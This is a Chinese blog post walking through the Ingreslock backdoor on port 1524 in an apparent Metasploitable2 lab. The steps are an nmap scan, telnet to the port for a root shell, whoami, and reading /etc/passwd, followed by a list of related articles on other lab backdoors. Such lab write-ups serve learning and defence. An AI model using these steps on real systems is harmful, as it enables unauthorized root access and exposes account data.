Ingreslock后门漏洞

最新推荐文章于 2024-07-08 19:10:00 发布
最新推荐文章于 2024-07-08 19:10:00 发布
阅读量1.9k 收藏 2
点赞数 1
分类专栏: 端口漏洞

        找到工作后,学习时间少了很多,今天在学习时,发现了一个比较好玩的端口后门漏洞,就是1524端口漏洞,现在我把该过程记录下来。

1524端口简介:

服务:ingress 
说明:许多攻击脚本将安装一个后门SHELL于这个端口,尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图,很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口,看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。

目的:

利用Telnet命令链接目标主机的1524端口,直接获取root权限。

原理:

Ingreslock后门程序监听1524端口,连接到1524端口就可以直接获取root权限。

准备:

1.Kali系统版本2.0

2.攻击主机IP:192.168.1.2   靶机IP:192.168.1.3

实战:

Step1:扫描目标主机端口:在终端输入nmap -sV 192.168.1.3

Step2:连接目标主机:在终端输入telnet 192.168.1.3 1524

Step3:查找获取的权限:在终端输入whoami

Step4:查看主机密码文件:在终端输入cat  /etc/passwd

chaojixiaojingang
关注
专栏目录
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1063
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
漏洞验证】Metasploitable2靶机漏洞复现
weixin_43486390的博客
12-10 2868
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Bind Shell Backdoor Detection4、UnrealIRCd Backdoor(ircd) Metasploitable2靶机漏洞复现 环境IP:192.16...
Ingreslock1524端口后门漏洞
qq_36609913的博客
11-20 2015
Ingreslock1524端口后门漏洞
黑客利用关键的VMware RCE漏洞安装后门
m0_71745754的博客
02-17 292
调查发现,高级黑客正在积极利用影响VMware Workspace ONE Access(以前称为 VMware IdentityManager)的关键远程代码执行(RCE)漏洞CVE-2022-22954。庆幸的是,该问题已在20天前的安全更新中得到解决,不过另外两个编号为RCE -CVE-2022-22957和CVE-2022-22958的漏洞也会影响VMware Identity Manager (vIDM)、VMware。
6-18漏洞利用-后门连接
山兔的博客
07-25 882
我们一定要检测,当前系统,开放了那些端口,在某些情况下,尽量没有使用的端口,尽量关闭,我们只开启,我们服务器运行状态下,必须要开启的端口号,不相关的端口号,直接关闭,当然,我们也要实时监测系统服务器的网络状态,在出现连接过程中,我们一定要注意很有可能,这就是一次连接后门程序的一个活动,我们要对它进行实时监控。我们根据bindshell,猜测到,会是一个后门程序,这个时候,我们就需要验证这个猜测,我们用nc连接目标地址的端口号,来对其后门进行连接,从而获取对应的权限。我们服务器为什么存在后门程序。...
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4635
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
Metasploitsble2靶机的介绍和攻击
weixin_41487522的博客
12-10 1752
Metasploitsble2靶机的介绍和攻击 一、Metasploitable2简介: Metasploitable2 Linux系统是一个特别制作的Ubuntu系统,本身设计目的是作为安全工具测试和模拟漏洞环境。最重要的是可以用来作为渗透工具集MSF攻击用的靶机。 Metasploitale2上面开放了很多高危端口如21、23、445、3389等,而且具有很多未经修补的高危漏洞,如Samba、MS-RPC Shell命令注入、弱口令等。Metasploitable2是一个虚拟机文件,去网上下载后可以解压
Metasploitable2靶机渗透笔记
qq_60600840的博客
07-20 838
metaspolitable靶机、安全、渗透、靶机
简单去除后门
01-25
简单去除后门
6-16漏洞利用-rlogin最高权限登陆
山兔的博客
07-24 1435
远程登录(rlogin)是一个UNIX命令,在远程服务端的话,是一个服务,它允许授权用户进入网络中的其它UNIX机器并且就像用户在实际现场操作一样。一旦我们使用rlogin这条命令,登录到开启rlogin服务的主机,那这个时候,用户就可以操作主机允许的任何事情对IP地址进行探测,探测出rlogin这样的服务,它开启的是513端口,以及512是它验证的端口我们确认了目标开放了rlogin服务。...
Metasploitable2靶机之第十二篇--后门漏洞
千寻的博客
04-02 1087
文章目录环境Ingreslock 后门漏洞原理复现Rlogin 后门漏洞原理复现摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 Ingreslock 后门漏洞 原理 Ingreslock后门程序监听在1524端口, 链接到1524端口就可以直接获得root权限。 复现 执行 telnet 102.168.232.202 1524 Rlogin 后门漏洞 原理 TCP端口512,513
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4319
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
WebServer端口复用后门
小威的博客
03-11 2837
0x00 有朋友问到了我一个关于“无端口可用”的问题。说在如下图所示的内网环境中,firewall只允许Web Server的80端口建立网络连接,并且Web Server上的80端口已经被IIS、Apache等软件占用了的情况下,怎么建立一个RAT后门。 0x01 早些时候的著名后门byshell就考虑到了这个问题,于是使用了一种非常挫的方式去解决。客户端将数据发送到8
常见端口漏洞
qq_38135115的博客
04-19 7114
常见服务端口 21端口 FTP(file Transfer Protocol)文件传输协议 1.匿名访问——未授权访问 2.弱密码 3.配置不当 直接 cd / && dir 4.FTP使用明文传输技术-嗅探 5.木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。 21端口是默认的FTP端口,利用方式:弱口令探测/溢出 目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个
80端口后门
caiguazheng4921的博客
11-28 165
原文如下:        参考LCX在X档案发表过永远不被杀的的后门,自己就实验起来,只要把ASP***放到其中一个站点中某个深的目录中,再在Internet 服务管理器面中选着这个站点(比如默认管理站点)打开修改属性->主目录中,把“应用程序保护”中改为"低",再在"写入""前面打上钩,在浏览器中输入ASP***路径,输入密码以后进入管理页面,运行CMD命令还可以加用...
vos3000 2.8.0 无后门公司自用安装包教程-包可用 下载链接已修复
最新发布
hendy9987的博客
07-08 659
vos3000 2.8.0 无后门公司自用安装包教程-包可用 下载链接已修复
imessage后门漏洞
12-29
iMessage是苹果公司的即时通讯服务,但近日有报道指出iMessage存在后门漏洞。据称,黑客可以利用这一漏洞,通过远程方式访问用户的设备并获取用户的个人信息,甚至可以窃取用户的资金。 这一后门漏洞的存在对用户的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值